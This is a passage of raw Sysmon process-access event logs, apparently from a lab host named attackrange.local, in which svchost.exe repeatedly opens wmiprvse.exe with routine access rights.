C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 